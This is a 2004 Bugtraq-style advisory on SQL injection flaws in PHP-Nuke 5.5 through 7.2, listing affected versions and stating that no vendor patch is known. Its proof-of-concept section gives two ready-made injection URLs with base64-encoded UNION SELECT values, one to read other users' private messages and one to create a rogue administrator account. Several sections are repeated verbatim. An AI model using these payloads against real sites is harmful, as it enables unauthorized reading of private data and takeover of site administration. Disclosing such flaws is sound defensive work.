PHP-Nuke Multiple SQL Injection Vulnerabilities
BID:10135
Info
PHP-Nuke Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 10135 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 13 2004 12:00AM |
| Updated: | Apr 13 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Janek Vind "waraxe". |
| Vulnerable: |
Francisco Burzi PHP-Nuke 7.2 Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 FINAL Francisco Burzi PHP-Nuke 7.0 Francisco Burzi PHP-Nuke 6.9 Francisco Burzi PHP-Nuke 6.7 Francisco Burzi PHP-Nuke 6.6 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 FINAL Francisco Burzi PHP-Nuke 6.5 BETA 1 Francisco Burzi PHP-Nuke 6.5 Francisco Burzi PHP-Nuke 6.0 Francisco Burzi PHP-Nuke 5.5 |
| Not Vulnerable: | |
Discussion
PHP-Nuke Multiple SQL Injection Vulnerabilities
Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.
As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.
Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.
As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.
Exploit / POC
PHP-Nuke Multiple SQL Injection Vulnerabilities
No exploit is required to leverage this issue. The following proof of concept has been provided:
To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
No exploit is required to leverage this issue. The following proof of concept has been provided:
To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Solution / Fix
PHP-Nuke Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP-Nuke Multiple SQL Injection Vulnerabilities
References:
References:
- [waraxe-2004-SA#017] - [ Admin-level authentication bypass in phpnuke 6.x-7.2 ] (Janek Vind "waraxe")
- [waraxe-2004-SA#017] - [ User-level authentication bypass in phpnuke 6.x-7.2 ] (Janek Vind "waraxe")